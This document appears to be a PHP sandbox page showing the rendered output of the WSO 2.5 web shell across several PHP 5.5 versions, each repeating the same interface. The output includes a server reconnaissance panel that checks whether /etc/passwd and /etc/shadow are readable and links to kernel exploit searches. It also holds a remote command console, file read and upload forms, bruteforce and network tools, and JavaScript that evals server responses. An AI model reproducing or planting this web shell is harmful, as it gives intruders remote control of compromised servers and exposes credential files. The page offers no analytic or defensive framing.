class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.4
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.4 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.3
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.2
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.2 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.1
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.1 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.0
